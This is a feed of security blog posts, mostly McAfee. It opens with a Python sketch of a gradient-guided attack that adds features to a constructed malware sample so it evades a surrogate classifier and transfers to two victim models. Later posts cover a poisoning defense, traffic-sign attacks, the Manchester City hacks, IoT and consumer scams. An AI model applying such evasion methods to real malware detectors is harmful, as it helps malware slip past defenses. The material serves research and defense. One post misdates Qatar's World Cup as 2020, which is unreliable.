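    """Does an example crafted against MODEL_A also evade each victim?"""
    return {
        "linear_svm": not svm_is_malware(VICTIM_SVM, x_adv),
        "centroid": not centroid_is_malware(VICTIM_CENTROID, x_adv),
    }


if __name__ == "__main__":
    print("original p(malware) under MODEL_A: %.3f" % p_malware(MODEL_A, MALWARE_SAMPLE))
    x_adv, added = jsma_add_only(MODEL_A, MALWARE_SAMPLE)
    print("features added:", added)
    print("adversarial p(malware) under MODEL_A: %.3f" % p_malware(MODEL_A, x_adv))
    print("evades black-box victims:", transfer_report(x_adv))
```

The centroid victim weighs every feature equally, so two added features barely move it; that is the "features and properties similar enough" caveat in practice.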

3. Physical Attack of Traffic Signs

While malware represents the most common artifact deployed by cybercriminals to attack victims, numerous other targets exist that pose equal or perhaps even greater threats. Over the last 18 months, we have studied what has increasingly become an industry research trend: digital and physical attacks on traffic signs. Research in this area dates back several years and has since been replicated and enhanced in numerous publications. We initially set out to reproduce one of the original papers on the topic, and built a highly robust classifier, using an RGB (Red Green Blue) webcam to classify stop signs from the LISA[6] traffic sign data set. The model performed exceptionally well, handling lighting, viewing angles, and sign obstruction. Over a period of several months, we developed model hacking code to cause both untargeted and targeted attacks on the sign, in both the digital and physical realms. Following on this success, we extended the attack vector to speed limit signs, recognizing that modern vehicles increasingly implement camera-based speed limit sign detection, not just as input to the Heads-Up-Display (HUD) on the vehicle, but in some cases, as input to the actual driving policy of the vehicle. Ultimately, we discovered that minuscule modifications to speed limit signs could allow an attacker to influence the autonomous driving features of the vehicle, controlling the speed of the adaptive cruise control! For more detail on this research, please refer to our extensive blog post on the topic.

4. Detecting and Protecting Against Model Hacking

The good news is that much like classic software vulnerabilities, model hacking is possible to defend against, and the industry is taking advantage of this rare opportunity to address the threat before it becomes of real value to the adversary. Detecting and protecting against model hacking continues to develop with many articles published weekly.

Detection methods include ensuring that all software patches have been installed, closely monitoring drift of False Positives and False Negatives, noting cause and effect of having to change thresholds, retraining frequently, and auditing decay in the field (i.e., model reliability).  Explainable AI (“XAI”) is being examined in the research field for answering “why did this NN make the decision it did?” but can also be applied to small changes in prioritized features to assess potential model hacking.  In addition, human-machine teaming is critical to ensure that machines are not working autonomously and have oversight from humans-in-the-loop.  Machines currently do not understand context; however, humans do and can consider all possible root causes and mitigations of a nearly imperceptible shift in metrics.

Protection methods commonly employed include many analytic solutions: Feature Squeezing and Reduction, Distillation, adding noise, Multiple Classifier System, Reject on Negative Impact (RONI), and many others, including combinatorial solutions.  There are pros and cons of each method, and the reader is encouraged to consider their specific ecosystem and security metrics to select the appropriate method.
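
An added example (not McAfee code) of one protection method named above, Reject on Negative Impact (RONI), together with the false-negative monitoring the detection paragraph describes: each candidate training point is admitted only if retraining with it does not lower validation accuracy beyond a tolerance. The nearest-centroid model, points, labels and tolerance are constructed; the poison point is labelled "benign" to mimic the Training Set poisoning from the feedback-loop section.

```python
# Constructed two-feature training data: ((feature_x, feature_y), label).
BASE_TRAIN = [
    ((1.0, 1.0), "benign"), ((1.0, 2.0), "benign"),
    ((2.0, 1.0), "benign"), ((2.0, 2.0), "benign"),
    ((6.0, 6.0), "malware"), ((6.0, 7.0), "malware"),
    ((7.0, 6.0), "malware"), ((7.0, 7.0), "malware"),
]

# Constructed held-out validation set that RONI scores against; two malware
# points sit near the decision boundary, where poisoning shows up first.
VALIDATION = [
    ((1.5, 1.5), "benign"), ((2.5, 2.0), "benign"),
    ((3.0, 2.5), "benign"), ((2.0, 3.0), "benign"),
    ((5.5, 5.5), "malware"), ((5.0, 6.0), "malware"),
    ((4.5, 4.5), "malware"), ((5.0, 4.0), "malware"),
]

# Candidates arriving through the feedback loop: a genuine benign sample, a
# genuine malware sample, and a malware-like point the attacker labelled
# "benign" to drag the benign centroid toward the malware cluster.
CANDIDATES = [
    ((2.5, 1.5), "benign"),
    ((6.0, 8.0), "malware"),
    ((9.0, 9.0), "benign"),   # constructed poison point
]


def train_centroids(data):
    """Nearest-centroid 'training': the mean point of each class."""
    sums, counts = {}, {}
    for (x, y), label in data:
        sx, sy = sums.get(label, (0.0, 0.0))
        sums[label] = (sx + x, sy + y)
        counts[label] = counts.get(label, 0) + 1
    return {label: (sx / counts[label], sy / counts[label])
            for label, (sx, sy) in sums.items()}


def predict(centroids, point):
    """Label of the closest centroid (squared Euclidean distance)."""
    def dist2(c):
        return (c[0] - point[0]) ** 2 + (c[1] - point[1]) ** 2
    return min(centroids, key=lambda label: dist2(centroids[label]))


def accuracy(centroids, validation):
    correct = sum(predict(centroids, p) == label for p, label in validation)
    return correct / len(validation)


def false_negative_rate(centroids, validation):
    """Share of malware validation points the model calls benign; the drift
    metric the detection paragraph says to watch."""
    malware = [p for p, label in validation if label == "malware"]
    missed = sum(predict(centroids, p) == "benign" for p in malware)
    return missed / len(malware)


def roni_filter(base_train, candidates, validation, tolerance=0.05):
    """
    RONI: for each candidate, train with and without it and measure the change
    in validation accuracy. A candidate whose inclusion lowers accuracy by more
    than `tolerance` is rejected. Returns (accepted, rejected), each a list of
    (candidate, impact) with impact = accuracy_with - accuracy_without.
    """
    baseline = accuracy(train_centroids(base_train), validation)
    accepted, rejected = [], []
    for cand in candidates:
        acc_with = accuracy(train_centroids(base_train + [cand]), validation)
        impact = acc_with - baseline
        (rejected if impact < -tolerance else accepted).append((cand, impact))
    return accepted, rejected


if __name__ == "__main__":
    clean = train_centroids(BASE_TRAIN)
    poisoned = train_centroids(BASE_TRAIN + [CANDIDATES[2]])
    print("FNR clean: %.2f  FNR poisoned: %.2f" % (
        false_negative_rate(clean, VALIDATION), false_negative_rate(poisoned, VALIDATION)))
    accepted, rejected = roni_filter(BASE_TRAIN, CANDIDATES, VALIDATION)
    print("accepted:", accepted)
    print("rejected:", rejected)
```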

5. Model Hacking Threats and Ongoing Research

While there has been no documented report of model hacking in the wild yet, it is notable to see the increase of research over the past few years: from fewer than 50 literature articles in 2014 to over 1500 in 2020.  And it would be ignorant of us to assume that sophisticated hackers aren’t reading this literature.  It is also notable that, perhaps for the first time in cybersecurity, a body of researchers has proactively developed the attack, detection, and protection against these unique vulnerabilities.

We will continue to add to the greater body of knowledge of model hacking attacks as well as ensure the solutions we implement have built-in detection and protection.  Our research excels in targeting the latest algorithms, such as GANs (Generative Adversarial Networks) in malware detection, facial recognition, and image libraries.  We are also in the process of transferring traffic sign model hacking to further real-world examples.

Lastly, we believe McAfee leads the security industry in this critical area. One aspect that sets McAfee apart is the unique relationship and cross-team collaboration between ATR and AAT. Each leverages its unique skillsets: ATR with in-depth and leading-edge security research capabilities, and AAT through its world-class data analytics and artificial intelligence expertise. When combined, these teams are able to do something few can: predict, research, analyze and defend against threats in an emerging attack vector with unique components, before malicious actors have even begun to understand or weaponize the threat.

For further reading, please see any of the references cited, or “Introduction to Adversarial Machine Learning” at https://mascherari.press/introduction-to-adversarial-machine-learning/

[1] Courtesy of Technische Universitat Braunschweig.

[2] Grosse, Kathrin, Nicolas Papernot, et al. “Adversarial Perturbations Against Deep Neural Networks for Malware Classification.” Cornell University Library. 16 Jun 2016.

[3] Cleverhans: An adversarial example library for constructing attacks, building defenses, and benchmarking both located at https://github.com/tensorflow/cleverhans.

[4] Goodfellow, Ian, et al. “Generative Adversarial Nets” https://papers.nips.cc/paper/5423-generative-adversarial-nets.pdf.

[5] Papernot, Nicolas, et al. “Transferability in Machine Learning: from Phenomena to Black-Box Attacks using Adversarial Samples.” https://arxiv.org/abs/1605.07277.

[6] LISA = Laboratory for Intelligent and Safe Automobiles

The post Introduction and Application of Model Hacking appeared first on McAfee Blogs.

Consumers want a fully connected life – but at what cost?

Convenience has always been, and will always be, king. That’s why it’s no surprise that the average person is collecting connected devices left and right and is expected to own 15 connected devices by 2030. While they vary from person to person, recent research shows that the most popular connected devices tend to be smart meters, speakers, activity trackers, and TVs. That said, customers are curious and are keen to go even further, adopting the latest and greatest when it comes to connectivity. This could mean anything from a connected toaster, washing machine or garage, but for many, the connected car is the ultimate toy.

The consumer appeal behind device adoption is understandable – they’re entertaining and they make menial, everyday tasks easier to accomplish. A recent study on connected devices by TechUK found that 42% of consumers agree that both qualities are key drivers in their adoption – a similar finding seen in North America and across Europe. This is a huge shift in sentiment from years before when most consumers considered connected devices to be too complex and costly to be worthy of purchasing.

More 5G, more problems? 

As the demand for continuous connectivity grows, 5G will completely reshape the way consumers interact with the world around them. However, with more devices coming into homes, concerns around the way personal data and information is managed, controlled and used by organizations are starting to come into question.

Recent research shows that many consumer worries are specifically about safety and security: unreliable products, data breaches, and a lack of trust in smart technology manufacturers. In short, this shows worryingly low levels of trust in suppliers and a lack of knowledge about what fail-safe solutions are in place in case of emergency.

These concerns aren’t unwarranted. Over the past few years, consumers have been witness to some of the worst data breaches and cyber-attacks in history, and many have had a front seat to the growing number of IoT attacks taking hold of homes across the globe. These aren’t our parents’ attackers – today’s cybercriminals are savvy, smart and are fully aware of the lack of adequate security controls on many of these devices, leaving them in a perfect position to cause chaos.

Unfortunately, they’re doing a great job so far. Recent figures show that the total number of IoT malware samples grew 154% over the last year and just recently, McAfee Advanced Threat Research discovered a vulnerability in the Chamberlain MyQ Hub, a garage door automation platform, as well as an insecure design in the McLear NFC Ring that could allow an attacker to easily clone the ring and gain entry to a consumer home.

Next-generation concerns    

There’s no debate that analytics are key to making everyday technology smarter, faster and more efficient. They’re integral to the evolution of artificial intelligence (AI), reinforcement learning (RL) and robotic process automation (RPA) as well as cutting-edge consumer technologies like the connected car.

Nearly every modern vehicle uses state-of-the-art sensors that use analytics technologies like AI and ML. These technologies are specifically designed to automate many of the functions that humans would traditionally have done. These can include – but are not limited to – rain-sensors on the windshield to control wiper blades and sensors which detect objects to help avoid collisions.

As these technologies are central to the functionality of autonomous vehicles, researching potential weaknesses in the underlying systems has been key. To do this, the McAfee Advanced Threat Research Team (ATR) and the Advanced Analytics Team (AAT) recently came together to study how AI models within autonomous vehicles could be targeted by adversaries – a process now referred to as “Model Hacking”. To fully understand the potential for threat, the teams focused their efforts on the broadly deployed MobilEye camera system, which is currently used in over 40 million vehicles, including one of the leading connected car manufacturers. Through their research they successfully created a black-box targeted attack, causing the camera to misclassify a 35 mile-per-hour (mph) speed limit sign as 85 mph. This resulted in the vehicle increasing its speed to 85 mph on its own.

While it’s currently unlikely that this type of attack would be used to do harm, being able to get ahead of the problem and understand where potential risks lie is vital. It is also important that industry leaders work together to shift perception that machine learning and AI systems are automatically secure in order to drive success in autonomous driving. This means opening up the discussion and raising awareness of the problems and pitfalls to steer the direction and development of safer next-generation technologies.

Taking security into their own hands

Despite the valid concerns around safety, security and information management, the rollout of 5G will only continue to encourage the use of smarter and more efficient IoT devices. But how can consumers fully enjoy the benefits of these new technologies when the most malicious actors continue to evolve and exploit the existing, and arguably sometimes lackluster, security controls in place? Get in control! Consumers must take a stand to safeguard their homes from within and start asking the question: is this device secure?

Running point on your online security may seem overwhelming at first, but it’s possible to both reap the benefits of your connected devices while staying safe – here’s how:

  • Practice proper online security habits: The silver lining of all this security chaos is that there are now countless ‘best practices’ consumers can quickly adopt. These include implementing a strong password policy, putting IoT devices on their own, separate network, and utilizing dual-factor authentication when possible.
  • Do your research: Before purchasing a new IoT device, take the time to look into its security features and understand the security risks associated. Ensure you have the industry knowledge to make sure you’re buying the safest tools available on the market.
  • Buy through trusted advisors. Some brands have your best interests in mind and unfortunately, some don’t. Being able to identify which ones do can make the difference between being a victim or not.
  • Act: While the accuracy and agility of intelligent systems offers convenience, don’t assume any sort of hiccup is just a fluke. If something seems off with the technology, raise the issue to the manufacturer.
  • Always update: Part of the convenience of connected technologies is that they have the ability to update remotely. When one of these updates is offered by the manufacturer, make sure to take the time to install it as soon as possible.

Of course, the onus does not fall solely on the consumer. Brands must do their part in ensuring the supply chain is secure and that consumers’ online lives are fully protected end-to-end. Doing this starts with designing IoT devices with security in mind. IoT manufacturers must embed security into the architecture, interfaces, and designs of their products. They must ensure device identity and authentication are a part of the provisioning and configuration process and must work with consumers to empower them to apply proper administration and management throughout the lifecycle of their device.

From 5G and autonomous cars to smart cities and AI, the next few years will no doubt be a transformative time for technology. Though for organizations and consumers to get the full benefits from these technologies, the industry must work together to eliminate risks from the inside out. Sharing the responsibility of safety will be a crucial part in tackling the insidious threats facing us today. It will ensure consumers all across the world will be able to stay connected and live an increasingly digital, convenient and efficient life.

The post Consumers want a fully connected life – but at what cost? appeared first on McAfee Blogs.

The Billion Pound Manchester City Hack

The sport of football is a multi-billion-pound global industry, where the world's top-drawer football clubs push competitive advantages to the extreme, not just for the prestige of winning trophies, as success on the pitch also means a greater slice of jaw-dropping TV, sponsorship and advertising revenues. 

The key commodity in the football industry is football players; elite talent players command transfer fees up to 100 times their weight in gold and receive millions a year in wages.  Investing in recruiting the best football players increases the likelihood of winning matches, titles and lucrative financial rewards. The competition for success is especially fierce between Europe's largest football clubs. This is leading to ever-inflating player transfer fees and wages, rippling downwards throughout football's global pyramid of leagues, with many clubs gambling with financial outlays on recruiting player talent, in hope of achieving the financial rewards which success on the football pitch brings.

Top Ten Football Club Revenues in 2018-19 (change from 2017-18)
 1  Barcelona            £741.1m  (+£129.5m)
 2  Real Madrid          £667.5m  (+£2m)
 3  Manchester United    £627.1m  (+£37.3m)
 4  Bayern Munich        £581.8m  (+£24.4m)
 5  Paris St-Germain     £560.5m  (+£80.6m)
 6  Manchester City      £538.2m  (+£34.7m)
 7  Liverpool            £533m    (+£77.9m)
 8  Tottenham            £459.3m  (+£79.9m)
 9  Chelsea              £452.2m  (-£4.2m)
10  Juventus             £405.2m  (-£55.7m)
Source: Deloitte Football Money League

The Deloitte Football Money League illustrates the scale and growth in revenues at Europe's top tier clubs. Most of this revenue is acquired through participation in the UEFA Champions League (up to £150m), club sponsorship deals, and national league TV deals, especially the English Premier League, where clubs finishing in the top six positions are given around £150m a year. The number of bums on seats at stadia doesn't have the financial impact on a club's revenue stream that it once did. Success on the pitch is the greatest driver of a club's revenue; the new model of sustained success in football is recruiting and retaining the best squad of football players.

Such high stakes and large financial numbers are a recipe for pushing and bending football's rules: Real Madrid, Barcelona, Atletico Madrid, Liverpool, Chelsea and Manchester City have all been disciplined for breaking youth player recruitment rules. Football's rules are written and enforced by football’s various governing bodies, starting with country-level governance such as the English Premier League and The English Football Association (The FA), continental level governance such as the Union of European Football Associations (UEFA) and finally the global football authority, which is the Fédération Internationale de Football Association (FIFA).

The Million Pound Manchester City Hack
As football players are the key elements of achieving success, most top tier clubs invest heavily to build intelligence on the best players to recruit. Clubs operate scouting networks on a global scale, utilising applications to gather and record statistical player data, and employ expert analysts to crunch those stats. All to determine which players they should target to improve their squad, when they should attempt to buy, and how much they should spend to achieve a maximum return on their investment.
Manchester City have a rocky relationship with UEFA

The top two rivals competing for success in the English Premier League in recent years have been Manchester City and Liverpool football clubs, with both clubs winning several major titles. At the end of the 2011/12 season, it was a different story: Manchester City had won the Premier League title while Liverpool finished in 8th position, outside of lucrative Champions League qualification and 47 points behind City.  At the end of that season, Liverpool 'poached' two of Manchester City's scouting and recruitment leads, Dave Fallows and Barry Hunter, as their head of scouting and chief scout respectively.  Fourteen months after these appointments were made, Liverpool paid Manchester City £1 million as part of a confidential settlement after it was alleged City’s cloud-based scouting application, Opta's Scout7, had been accessed by Liverpool FC staff on hundreds of occasions.  Whether this breach was 'assisted' by Manchester City not removing ex-employee access to their Scout7 app, or involved the hacking of City's accounts, remains undisclosed.
Player Scouting App Scout7

The Premier League was not informed about this incident and the settlement until September 2019, when it launched an investigation, but it confirmed on 7th February 2020 that it would not be bringing any charges. An FA spokesperson said: “The FA carefully considered the evidence received in this matter, including information provided by both clubs involved, and has decided not to progress the investigation. This is due to a number of factors including the age of the alleged concerns and the settlement agreed by the two clubs involved. As per standard protocol, should the FA receive further information or evidence, the decision not to progress the investigation may be reviewed.”

Since the hack, Liverpool's success on the pitch has seen a major resurgence. Under their current manager Liverpool have spent £400 million on recruiting new players, creating arguably one of the strongest squads they have ever had: a squad which won the Champions League last season, while this season Liverpool stands to win the Premier League title for the first time in their history by some distance. The role of this alleged City hack in Liverpool's recent rise to the top can never be known; coincidence or not, most football pundits agree Liverpool's player recruitment in recent years has been first class.

As of 25th May 2018 such hacked data breaches are required to be disclosed to the UK's Information Commissioner's Office (ICO), and could theoretically cost Manchester City, and perhaps Liverpool, millions in fines under the recently updated UK Data Protection Act, which incorporates the European General Data Protection Regulation (GDPR). Given that the Scout7 app holds the personal data of European players, and that GDPR fines can be up to 4% of global turnover, this means a potential ICO fine of up to £20 million. And accessing or hacking into systems without permission is a criminal offence under the UK Computer Misuse Act.

The Billion Pound Manchester City Hack
On 14th February, UEFA's Chamber of the Club Financial Control Body (CFCB) announced its decision to ban Manchester City from competing in European competition for two years, together with a £25 million fine, for breaching UEFA’s Financial Fair Play (FFP) rules.

The revenue lost from missing two Champions League campaigns could cost the Manchester club around £300 million in total. The Premier League and the English FA are also investigating City on the back of the UEFA investigation, so could follow suit with their own FFP sanctions, with media speculating that such investigations could result in City's relegation to England's bottom tier of professional football. Dropping to League Two could potentially cost the club around £1 billion in lost TV revenues alone. However, Man City quickly announced they will be challenging UEFA’s findings and disciplinary action through the Court of Arbitration for Sport (CAS), so it remains to be seen whether those UEFA disciplinary sanctions will stand. City’s FFP woes all started with a hack of their email system, a hack which could ultimately cost the club over a billion pounds.

Is Football 'Wikileaks' Ethical?
UEFA's investigation into City started with the club's hacked internal emails being disclosed to the media by a hacker through a 'football leaks' website. On 5th November 2018, the German magazine ‘Der Spiegel’ (The Mirror) published an article which claimed City and their sponsors had manipulated sponsorship contracts to circumvent UEFA FFP rules, inflating the value of their commercial income. The Spiegel article supported its claims of FFP ‘wrongdoing’ by quoting extracts from senior Manchester City club officials' stolen internal emails.

Portuguese resident Rui Pinto is alleged to be the hacker who successfully hacked into City's internal email system in 2015. Pinto was arrested and remains in prison awaiting trial on 90 different counts of hacking, sabotage and fraud. Pinto reportedly took 70 million documents and 3.4 terabytes of information from a string of football clubs and high profile players, releasing the data via the 'football leaks' website (https://footballleaks2015.wordpress.com/).  

Pinto told Der Spiegel he was aware of the risks of his work and is quoted as saying “I initiated a spontaneous movement of revelations about the football industry.” So depending on your viewpoint, and likely your football club loyalty, this 'Wikileaks for football' is either ethical on transparency grounds, or it should not be condoned given the information was obtained by illegal means. Just like the actual Wikileaks, individual views will be polarised on the ethics of leaking private and confidential information into the public domain. Although, given the tribal and competitive nature of most football fans, most football fans other than Manchester City fans are likely to agree the illegal method was justified.


Rui Pinto, Criminal Hacker or Whistleblower?

It seems UEFA also agree with the illegal method used, as on the back of the Der Spiegel article and hacked emails, UEFA began its investigation into Manchester City in March 2019, stating “The investigation will focus on several alleged violations of FFP that were recently made public in various media outlets.”

The 'Ethical' Legal Battle Ahead
When police authorities and prosecutors do not collect evidence using legal means in criminal trials, such evidence becomes inadmissible in court. Digital evidence that has not been forensically acquired can also be challenged and dismissed, and hacked emails held as text files can easily be doctored. For instance, in 2018 key documents supporting rape claims against Cristiano Ronaldo, obtained through the Football Leaks website, were dismissed by Ronaldo's lawyers as having been fabricated by hackers.

If all the other top tier football clubs had all their internal emails disclosed to the media and UEFA investigators, how many other clubs would be found to have bent or broken FFP rules as well?  There are many football fans deeply suspicious about the finances and commercial sponsorship deals at many of Europe’s elite football clubs.

The City email hack will have significant ramifications for the football industry, and the power of UEFA and its enforcement of FFP will be tested. With millions at stake, Manchester City’s lawyers and UEFA will be fighting it out in the courts in the coming months, and the ethics of using data leaks as evidence will be one of the key arguments.

Let Him Who Is Without Sin Cast the First Stone
UEFA doesn’t exactly have a good track record on ethics either: former UEFA Chief Michel Platini was banned from all football activity for 8 years by FIFA’s Ethics Committee in 2015. In June 2019 Platini was questioned by police in regards to his backing of Qatar's bid to host the 2020 World Cup, despite allegedly telling American officials he would be voting for the United States. Then there is the ethics of UEFA fining football clubs multi-millions for breaching FFP, while at the same time fining clubs in the low thousands for breaches of its racism rules.

Titan Security Keys – now available in Austria, Canada, France, Germany, Italy, Japan, Spain, Switzerland, and the UK

Security keys provide the strongest protection against phishing attacks. That’s why they are an important feature of the Advanced Protection Program that provides Google’s strongest account protections for users that consider themselves at a higher risk of targeted, sophisticated attacks on their personal or work Google Accounts.

Last year, we made the Titan Security Key bundle with USB-A/NFC and Bluetooth/USB/NFC keys available in Canada, France, Japan, the UK, and the US. Starting today, USB-C Titan Security Keys are available in those countries, and the bundle and USB-C Titan Security Keys are now available on the Google Store in Austria, Germany, Italy, Spain, and Switzerland.

Titan Security Keys are now available in 10 countries

Security keys use public-key cryptography to verify your identity and the URL of the login page, so that an attacker can’t access your account even if they have your username and password. Unlike other two-factor authentication (2FA) methods that try to verify your sign-in, security keys support FIDO standards that provide the strongest protection against automated bots, bulk phishing attacks, and targeted phishing attacks.

We highly recommend that users at a higher risk of targeted attacks (e.g., political campaign teams, activists, journalists, IT administrators, executives) get Titan Security Keys and enroll in the Advanced Protection Program (APP). If you’re working in a federal political campaign team in the US, you can now request free Titan Security Keys via Defending Digital Campaigns and get help enrolling in the APP. Bulk orders are also available for enterprise organizations in select countries.

You can also use Titan Security Keys for any site where FIDO security keys are supported for 2FA, including your personal or work Google Account, 1Password, Bitbucket, Bitfinex, Coinbase, Dropbox, Facebook, GitHub, Salesforce, Stripe, Twitter, and more.

Complying with CCPA: Answers to common questions

Enforcement of the California Consumer Privacy Act begins this summer, but lawsuits are already being filed. To help you comply and avoid being sued, CSO contributor Maria Korolov joins IDG TECH(talk) host Juliet Beauchamp to discuss critical components of the CCPA and answer viewers’ questions.

Connect with NICE at RSA Conference 2020

At this year's RSA Conference in San Francisco, CA, NIST staff will be hosting a number of presentations, interactive meetings, demos, and panels. The following sessions may be of interest if you are attending the event from February 24-28.

Attend a Session

How to Deploy Secure Technologies to Help Reduce eCommerce Fraud
February 25, 2020 | 1:00 PM - 1:50 PM
Moscone West 2006
Learn more here.

Use Cases for the NICE Cybersecurity Workforce Framework
February 26, 2020 | 8:00 AM - 9:45 AM
Marriott Marquis San Francisco
*Separate registration required. Invite required. Please send inquiries to

Our personal health history is too valuable to be harvested by the tech giants | Eerke Boiten

Action to prevent deeper access to our private lives and data is more essential than ever

Health data paints a rich picture of our lives. Even if you remove your name, date of birth and NHS number to “anonymise” yourself, a full health history will reveal your age, gender, the places where you have lived, your family relationships and aspects of your lifestyle.

Used in combination with other available information, this may be enough to verify that this medical history relates to you personally and to target you online. Consequently, whenever the NHS shares health data, even if it is anonymised, we need to have confidence in who it goes to and what they can do with it.

When data about us influences a credit rating or a hiring decision, we are unlikely ever to find out


Timeless Principles to Help Your Child Develop Social Superpowers

online relationships

“You can make more friends in two months by becoming interested in other people than you can in two years by trying to get other people interested in you.” ~ Dale Carnegie

Each year it’s my tradition to re-read a handful of books that continue to shape my perspective. One of those books is the 1936 self-help classic, How to Win Friends and Influence People by Dale Carnegie.

I’ll admit, I’ve never liked the book’s overly-schmoozy title, but its content is gold. And 84 years later, it’s still relevant to our ongoing family discussion of how to model leadership and get a more meaningful return on our digital connections.

Slow down, look around

It has become easy, and almost habitual, to move fast, skim content, and make quick judgments. We upload details about ourselves, our opinions, our activities, our agendas, our wins.

Carnegie’s approach (condensed and paraphrased): Slow down and look around. Take a genuine interest in the people around you. Make room for different points of view. Steer clear of drama, criticizing others, and conflict. And never make anyone feel “less than.”

Social superpowers

Carnegie’s principles, applied online, are tools parents can use to help kids develop their social superpowers. The simple act of slowing down and listening instead of clicking is a big step toward more genuine connections.

On the safety side, slowing down can help kids become more aware of and avoid threats such as cyberbullying, scams, catfishing, and online conflict.

Here are a few more Carnegie power tips (condensed and paraphrased) to help build up your family’s social superpowers.

More meaningful connections

Take a genuine interest in others. “If we want to make friends, let’s do things for other people – things that require time, energy, unselfishness, and thoughtfulness.”

Encourage your child to step out of the “selfie” mindset as a first step in forming more genuine friendships online (as opposed to amassing followers). Brainstorm ways to do this. Maybe it’s more face-to-face time with known friends, keeping track of other people’s birthdays, and hand-writing cards and sending them in the mail. Paying attention to the details of a person’s life — their hobbies, family members, values, and goals — is the heartbeat of a real friendship.

Smile, be welcoming.  “Actions speak louder than words, and a smile says, ‘I like you. You make me happy. I am glad to see you.’”

Sounds simple, but a smile — in this case, the way we welcome others online — can go a long way. The attitude we express through our online interactions can make or break our relationships and reputation.

Encourage your child to review and delete negative or harmful content that lacks a spirit of inclusion and kindness. Our social profiles may be the first impression others — including teachers, colleges, and employers — may have of us.

Another plus: Choosing a digital “smile” when we post (over drama and making fun) sends a powerful message that can ease cyberbullying, build empathy, and be a source of strength for others who may be struggling.

Note: Choosing to smile online as a general principle doesn’t include faking it or only sharing a heavily-edited or overly positive version of your life. Be real. Be honest. Be you.

Affirm others. “. . . a sure way to [people’s] hearts is to let them realize in some subtle way that you realize their importance and recognize it sincerely.”

Every person on the planet has a fundamental need to be noticed and feel valued. With the amount of anxiety, depression, body image issues, and cyberbullying kids face online, what young person couldn’t use a genuine word of encouragement?

Discuss the many ways to affirm others on and offline. Encourage your child to be aware of and willing to compliment the strengths of others, cheer on accomplishments, and support a cause or passion they’ve expressed.

Avoid arguments and criticizing others. “Criticism is dangerous because it wounds a person’s precious pride, hurts his [or her] sense of importance, and arouses resentment.”

If we could all master these two Carnegie principles online, the world’s collective mental health might be on a happier, healthier trajectory.

Encourage your child to pay attention to his or her emotions and avoid engaging others if they feel angry, anxious, or tired. Discuss the importance of empathy and forgiveness. Challenge them to allow others to express their ideas without judgment.

Avoiding conflict doesn’t mean you ignore injustice or become a doormat. On the contrary, responding with grace in a tense situation requires strength and self-control — especially when it comes to trolls and bullies.

Carnegie wrote his book during the Great Depression, when the practice of optimism and simple truths was critical to a person’s hope. So, some perspectives will feel odd or passé. But stick with it. Savor and apply the gems and enjoy the process of deepening your digital connections.

The post Timeless Principles to Help Your Child Develop Social Superpowers appeared first on McAfee Blogs.

6 Noteworthy Data Breaches in 2019

2019 was a banner year for breaches. Some of the biggest victims included social media heavy-hitters Facebook and TikTok, as well as financial dynamo Capital One. They’re just the tip of the iceberg: according to Forbes, over 3,000 breaches in 2019 tallied up to 4.1 billion compromised data records. That’s a whopping 22.5 million records stolen by cyberattackers every day of last year.

We know from our 10th annual State of Software Security (SOSS) report that security debt is a major contributor to the risk of such breaches and attacks. We also learned that those who scan their code for security issues more frequently (300+ times per year) vastly reduce the amount of debt (and risk) they carry. DevSecOps programs that institute more frequent application scanning cadences and break down silos between security and development teams can be a leap forward for organizations like the ones that fell victim to attacks last year.

As cybersecurity becomes a more complex issue, businesses that handle sensitive data (from passwords to Social Security numbers, banking information, and even medical records) should take this ever-prevalent problem seriously in 2020 and beyond. Here’s a look at six of the biggest breaches we saw in 2019.

How You (and Your Teen) Can Stay Safe While Looking for Love Online

Valentine’s Day is such a double-edged sword. If you’re feeling the love and just can’t get enough of your sweetheart – then I wish you a wonderful day. If, on the other hand, you are unattached and feeling a little lonely then chances are you’re thinking about trying your luck on an online dating app.

Every year, traffic to dating apps surges around Valentine’s Day because let’s be honest – who wants to be lonely? But it’s not just adults who frequent dating sites to find their perfect match – teens do too!

Dating Apps – Proceed with Caution!!!

The increasing popularity of these sites means that scammers are spending considerable time and energy targeting people to con. And don’t forget that many teens are on these sites too – even as young as 16! You don’t have to look far to find stories of people who have been tricked into transferring large sums of money to their ‘online lovers’. And in more recent years, romance scammers are now tricking new partners into illegally relaying stolen funds!

Romance Scammers Now Searching for New ‘Online Love’ in Games

According to the Australian Competition and Consumer Commission (ACCC), romance scammers are now also targeting non-dating apps to look for new vulnerable ‘online lovers’. In fact, 38 Aussies lost almost $600,000 through the gaming app Words with Friends, an online version of Scrabble. Most of the losses were through direct bank transfers; however, iTunes, Steam and Google Play gift cards were also commonly used. Games such as Words with Friends are very popular with both tweens and teens, so please share these stories with them.

How to Stay Safe While Searching for Love Online

I have several friends who have found the ‘love of their lives’ online so please remember that not everyone you meet online is a scammer. However, it is essential that you are ALWAYS on guard and cautiously suspicious until such time as your new online love has proven themselves. Here are my top tips for staying safe:

  1. Limit how personal you get 

    Scammers today prey on the human need to feel connected to one another. The key is to always be careful with the information that you share online. Whether it’s Tinder, OkCupid, Bumble, or even Facebook or Instagram, only share what is absolutely necessary. The details you post can easily be pieced together by a scammer to access your personal information and your bank accounts, or even to steal your identity. Start by being clever with your profile names on dating sites and apps – never give out your full name.

  2. Do your homework

    If you’ve met someone online, always do your homework before meeting them in person. Why not get Google working for you? A Google search is a great place to start and even using Google Images will help you get a better understanding of a person. And don’t forget to check out their LinkedIn account too. Another option would be to track down mutual friends and ask questions about your new online partner.

  3. Think before you send

    Sharing intimate pictures or videos with the person you’re dating online may be a good idea right now but please take a moment before pressing send to think about how this could come back to haunt you in the future. Remember, once those pictures and videos are online, they are online forever. Even social media apps with disappearing images, such as Snapchat, can be easily circumvented with a screenshot.  It’s not just celebrities who have intimate pictures spread around the Internet!

  4. Make passwords a priority

    Ensure all your online dating and social media accounts, and all your devices, have separate and unique passwords. Ideally, each password should have a combination of lower and upper case letters, numbers and special characters. I love using a nonsensical, crazy sentence!

And please remember to share your online romance vigilance with your budding teen Romeos and Juliets. It is incredibly common for teens to use dating sites to find someone special. Even though it may be a tad awkward and uncomfortable, as parents we need to do all we can to keep our offspring safe – particularly when their hormones are raging!!

Till Next Time!!

Happy Valentine’s Day!!

The post How You (and Your Teen) Can Stay Safe While Looking for Love Online appeared first on McAfee Blogs.

Watch Out For IRS Scams and Avoid Identity Theft

It’s time to get those W-2 and 1099 tax forms ready. On January 27th, the IRS began accepting paper and electronic tax returns ahead of the April 15th due date. But as users prepare to file, scammers prepare to take advantage of innocent taxpayers with malicious tactics, looking to harvest the extensive amounts of personal data found in IRS tax documents. Let’s take a look at common tactics hackers may leverage this tax season.

Impersonation Schemes

